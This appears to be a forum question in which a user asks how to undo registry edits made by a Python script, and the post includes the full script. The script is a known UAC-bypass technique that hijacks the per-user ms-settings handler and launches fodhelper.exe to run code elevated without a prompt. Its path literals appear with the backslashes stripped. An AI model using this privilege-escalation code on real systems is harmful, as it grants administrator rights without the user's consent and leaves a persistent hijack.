How to undo registry entries from winreg in Python?

  python, registry, winreg

I used a script that modifies the Windows Registry to run a Python program as admin (bypassing UAC). But now I have a problem: when I use some Windows functions (like personalizing my desktop), it just tries to run the Python code. So I want to undo the registry edits.

Here is the Code:

import os
import sys
import ctypes
import winreg


# NOTE(review): none of the path literals below contain backslashes. The
# separators appear to have been stripped when the page was extracted; the
# values are reproduced exactly as shown.

# Command interpreter named in the command line that execute() builds.
CMD = r'C:WindowsSystem32cmd.exe'
# Windows binary that execute() starts after the registry values are written.
FOD_HELPER = r"C:WindowsSystem32fodhelper.exe"
# Interpreter name placed in the command line written to the registry.
PYTHON_CMD = 'python'
# Per-user (HKEY_CURRENT_USER) "open" command key for the ms-settings protocol.
# A command registered here takes precedence over the machine-wide handler for
# this account, which is why Settings pages such as Personalize launch the
# registered command instead. To undo the change, delete the per-user
# ms-settings class key (HKEY_CURRENT_USER > Software > Classes > ms-settings)
# so Windows falls back to the machine-wide handler.
# Writes to this key are a well-known detection point for UAC-bypass activity
# (MITRE ATT&CK T1548.002).
REG_PATH = "SoftwareClassesms-settingsshellopencommand"
# Name of the value that bypass_uac() sets to an empty string.
DELEGATE_EXEC_REG_KEY = "DelegateExecute"

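def is_running_as_admin():

    '''
    Checks if the script is running with administrative privileges.

    Returns True if it is running as admin, False otherwise. False is also
    returned when the check itself cannot be performed (for example when
    ctypes.windll is not available on the current platform).
    '''

    try:

        # IsUserAnAdmin() returns a C BOOL (an int); normalise it to a real
        # bool so the result matches the documented True/False contract.
        return bool(ctypes.windll.shell32.IsUserAnAdmin())

    except (AttributeError, OSError):

        # Deliberately narrow: a bare except would also swallow
        # KeyboardInterrupt and SystemExit.
        return False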

def create_reg_key(key, value):

    '''
    Writes one REG_SZ value under REG_PATH in the current user's hive.

    key   -- name of the value to set (bypass_uac() also passes None here,
             which presumably targets the key's default value)
    value -- string data stored under that name

    The key is created first if it does not exist. Registry errors propagate
    to the caller unchanged. The write is persistent: nothing in this file
    removes the key or its values again.
    '''

    hive = winreg.HKEY_CURRENT_USER

    # Ensure the key exists before it is opened for writing.
    winreg.CreateKey(hive, REG_PATH)

    handle = winreg.OpenKey(hive, REG_PATH, 0, winreg.KEY_WRITE)

    winreg.SetValueEx(handle, key, 0, winreg.REG_SZ, value)

    winreg.CloseKey(handle)

def bypass_uac(cmd):

    '''
    Registers cmd as the per-user handler command under REG_PATH.

    Two values are written through create_reg_key(), in this order:
    DELEGATE_EXEC_REG_KEY with an empty string, then the None-named value
    with cmd. Both stay in the registry after the script exits, so the
    handler remains redirected until the key is deleted. Registry errors
    propagate to the caller.
    '''

    pending_writes = (
        (DELEGATE_EXEC_REG_KEY, ''),
        (None, cmd),
    )

    for value_name, data in pending_writes:

        create_reg_key(value_name, data)


def execute():

    '''
    Reports whether the script is elevated and, if it is not, registers a
    command under REG_PATH and starts FOD_HELPER.

    Exits with status 0 after FOD_HELPER has been started and with status 1
    if a WindowsError is raised on the way. The registry values written by
    bypass_uac() are not cleaned up on either path, so they outlive the
    script and have to be removed separately.
    '''

    if is_running_as_admin():

        print ('[+] The script is running with administrative privileges!')

        return

    print ('[!] The script is NOT running with administrative privileges')

    print ('[+] Trying to bypass the UAC')

    try:

        # NOTE(review): the '' literal joins the directory and __file__ with
        # nothing in between; kept exactly as shown on the page.
        script_dir = os.path.dirname(os.path.realpath(__file__))

        current_dir = script_dir + '' + __file__

        cmd = '{} /k {} {}'.format(CMD, PYTHON_CMD, current_dir)

        bypass_uac(cmd)

        os.system(FOD_HELPER)

        sys.exit(0)

    except WindowsError:

        sys.exit(1)


# Script entry point: execute() runs only when the file is executed directly,
# not when it is imported.
if __name__ == '__main__':

    execute()

I want to undo the changes the code made. I tried to modify the registry myself (as admin), but it says I need permission from an unknown user.

If you need any other information or error messages, or have further questions, please tell me.

Source: Python Questions
